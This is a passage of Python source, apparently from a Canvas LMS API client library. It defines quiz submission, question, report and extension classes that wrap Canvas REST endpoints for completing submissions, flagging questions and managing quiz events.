            "quiz_submissions/{}/questions".format(self.id),
            _kwargs=combine_kwargs(**kwargs),
        )

        # Attach the data each question needs to make follow-up calls itself.
        questions = list()
        for question in response.json().get("quiz_submission_questions", []):
            question.update(
                {
                    "quiz_submission_id": self.id,
                    "validation_token": kwargs["validation_token"],
                    "attempt": self.attempt,
                }
            )
            questions.append(QuizSubmissionQuestion(self._requester, question))
        return questions

    def complete(self, validation_token=None, **kwargs):
        """
        Mark this quiz submission as complete.

        :calls: `POST
            /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id/complete`

        :param validation_token: Token received when the submission was created.
            If omitted, falls back to `self.validation_token`.
        :type validation_token: str

        :raises RequiredFieldMissing: If no validation token is available.

        :rtype: :class:`QuizSubmission`
        """
        try:
            kwargs["validation_token"] = validation_token or self.validation_token
        except AttributeError:
            raise RequiredFieldMissing(
                "`validation_token` not set on this QuizSubmission, must be passed"
                " as a function argument."
            )

        kwargs["attempt"] = self.attempt
        response = self._requester.request(
            "POST",
            "courses/{}/quizzes/{}/submissions/{}/complete".format(
                self.course_id, self.quiz_id, self.id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        response_json = response.json()["quiz_submissions"][0]
        return QuizSubmission(self._requester, response_json)

    def get_submission_events(self, **kwargs):
        """
        List the events recorded for this quiz submission.

        :calls: `GET
            /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id/events`

        :rtype: list of :class:`QuizSubmissionEvent`
        """
        response = self._requester.request(
            "GET",
            "courses/{}/quizzes/{}/submissions/{}/events".format(
                self.course_id, self.quiz_id, self.id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        events = response.json()["quiz_submission_events"]
        return [QuizSubmissionEvent(self._requester, event) for event in events]

    def get_submission_questions(self, **kwargs):
        """
        Get all questions of this quiz submission.

        :calls: `GET /api/v1/quiz_submissions/:quiz_submission_id/questions`

        :rtype: list of :class:`QuizSubmissionQuestion`
        """
        response = self._requester.request(
            "GET",
            "quiz_submissions/{}/questions".format(self.id),
            _kwargs=combine_kwargs(**kwargs),
        )
        questions = list()
        for question in response.json().get("quiz_submission_questions", []):
            question.update({"quiz_submission_id": self.id, "attempt": self.attempt})
            questions.append(QuizSubmissionQuestion(self._requester, question))
        return questions

    def get_times(self, **kwargs):
        """
        Get the timing data (end time, time left) for this quiz submission.

        :calls: `GET
            /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id/time`

        :rtype: dict
        """
        response = self._requester.request(
            "GET",
            "courses/{}/quizzes/{}/submissions/{}/time".format(
                self.course_id, self.quiz_id, self.id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        return response.json()

    def submit_events(self, quiz_submission_events, **kwargs):
        """
        Store a list of events for this quiz submission.

        :calls: `POST
            /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id/events`

        :param quiz_submission_events: A non-empty list of QuizSubmissionEvent
            objects.
        :type quiz_submission_events: list of :class:`QuizSubmissionEvent`

        :raises RequiredFieldMissing: If the parameter is not a non-empty list
            of QuizSubmissionEvent objects.

        :rtype: bool
        """
        # Fix: previously an empty list raised IndexError on the `[0]` access
        # instead of the documented RequiredFieldMissing.
        if (
            isinstance(quiz_submission_events, list)
            and quiz_submission_events
            and isinstance(quiz_submission_events[0], QuizSubmissionEvent)
        ):
            kwargs["quiz_submission_events"] = quiz_submission_events
        else:
            raise RequiredFieldMissing(
                "Required parameter quiz_submission_events missing."
            )
        response = self._requester.request(
            "POST",
            "courses/{}/quizzes/{}/submissions/{}/events".format(
                self.course_id, self.quiz_id, self.id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        return response.status_code == 204

    def update_score_and_comments(self, **kwargs):
        """
        Update the score and comments of this quiz submission.

        :calls: `PUT /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id`

        :rtype: :class:`QuizSubmission`
        """
        response = self._requester.request(
            "PUT",
            "courses/{}/quizzes/{}/submissions/{}".format(
                self.course_id, self.quiz_id, self.id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        response_json = response.json()["quiz_submissions"][0]
        response_json.update({"course_id": self.course_id})
        return QuizSubmission(self._requester, response_json)
@python_2_unicode_compatible
class QuizExtension(CanvasObject):
    """An extra-time/extra-attempts extension granted to a user for a quiz."""

    def __str__(self):
        return "{quiz}-{user}".format(quiz=self.quiz_id, user=self.user_id)
@python_2_unicode_compatible
class QuizQuestion(CanvasObject):
    """A single question belonging to a quiz."""

    def __str__(self):
        return "{name} ({id})".format(name=self.question_name, id=self.id)

    def delete(self, **kwargs):
        """
        Delete an existing quiz question.

        :calls: `DELETE /api/v1/courses/:course_id/quizzes/:quiz_id/questions/:id`

        :returns: True if the deletion was successful (HTTP 204), False otherwise.
        :rtype: bool
        """
        endpoint = "courses/{}/quizzes/{}/questions/{}".format(
            self.course_id, self.quiz_id, self.id
        )
        response = self._requester.request(
            "DELETE", endpoint, _kwargs=combine_kwargs(**kwargs)
        )
        return response.status_code == 204

    def edit(self, **kwargs):
        """
        Update an existing quiz question, refreshing this object in place.

        :calls: `PUT /api/v1/courses/:course_id/quizzes/:quiz_id/questions/:id`

        :rtype: :class:`QuizQuestion`
        """
        endpoint = "courses/{}/quizzes/{}/questions/{}".format(
            self.course_id, self.quiz_id, self.id
        )
        response = self._requester.request(
            "PUT", endpoint, _kwargs=combine_kwargs(**kwargs)
        )
        payload = response.json()
        payload["course_id"] = self.course_id
        # Refresh this instance with the server's response rather than
        # constructing a new object.
        super(QuizQuestion, self).set_attributes(payload)
        return self
@python_2_unicode_compatible
class QuizReport(CanvasObject):
    """A generated (or in-progress) report for a quiz."""

    def __str__(self):
        return "{type} ({id})".format(type=self.report_type, id=self.id)

    def abort_or_delete(self, **kwargs):
        """
        Abort the generation of this report, or remove a previously generated one.

        :calls: `DELETE /api/v1/courses/:course_id/quizzes/:quiz_id/reports/:id`

        :returns: True if the request succeeded (HTTP 204), False otherwise.
        :rtype: bool
        """
        endpoint = "courses/{}/quizzes/{}/reports/{}".format(
            self.course_id, self.quiz_id, self.id
        )
        response = self._requester.request(
            "DELETE", endpoint, _kwargs=combine_kwargs(**kwargs)
        )
        return response.status_code == 204
@python_2_unicode_compatible
class QuizSubmissionEvent(CanvasObject):
    """An event recorded during a quiz submission (e.g. a page focus change)."""

    def __str__(self):
        return "{}".format(self.event_type)
@python_2_unicode_compatible
class QuizSubmissionQuestion(CanvasObject):
    """A single question within a quiz submission."""

    def __str__(self):
        return "QuizSubmissionQuestion #{}".format(self.id)

    def _set_flag_state(self, action, validation_token, kwargs):
        """
        Shared implementation for :meth:`flag` and :meth:`unflag`.

        `action` is the trailing URL segment, either "flag" or "unflag".
        Refreshes this object from the server response and returns True.
        """
        try:
            kwargs["validation_token"] = validation_token or self.validation_token
        except AttributeError:
            raise RequiredFieldMissing(
                "`validation_token` not set on this QuizSubmissionQuestion, must be passed"
                " as a function argument."
            )

        kwargs["attempt"] = self.attempt
        response = self._requester.request(
            "PUT",
            "quiz_submissions/{}/questions/{}/{}".format(
                self.quiz_submission_id, self.id, action
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        question = response.json()["quiz_submission_questions"][0]
        # Preserve the data needed for any follow-up calls on this object.
        question.update(
            {
                "validation_token": kwargs["validation_token"],
                "quiz_submission_id": self.quiz_submission_id,
            }
        )
        super(QuizSubmissionQuestion, self).set_attributes(question)
        return True

    def flag(self, validation_token=None, **kwargs):
        """
        Flag this quiz question for review.

        :calls: `PUT /api/v1/quiz_submissions/:quiz_submission_id/questions/:id/flag`

        :param validation_token: Token received when the submission was created.
        :type validation_token: str

        :raises RequiredFieldMissing: If no validation token is available.

        :rtype: bool
        """
        return self._set_flag_state("flag", validation_token, kwargs)

    def unflag(self, validation_token=None, **kwargs):
        """
        Remove the review flag from this quiz question.

        :calls: `PUT /api/v1/quiz_submissions/:quiz_submission_id/questions/:id/unflag`

        :param validation_token: Token received when the submission was created.
        :type validation_token: str

        :raises RequiredFieldMissing: If no validation token is available.

        :rtype: bool
        """
        return self._set_flag_state("unflag", validation_token, kwargs)
@python_2_unicode_compatible
class QuizAssignmentOverrideSet(CanvasObject):
    """The set of assignment overrides that apply to a given quiz."""

    def __str__(self):
        return "Overrides for quiz_id {}".format(self.quiz_id)
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.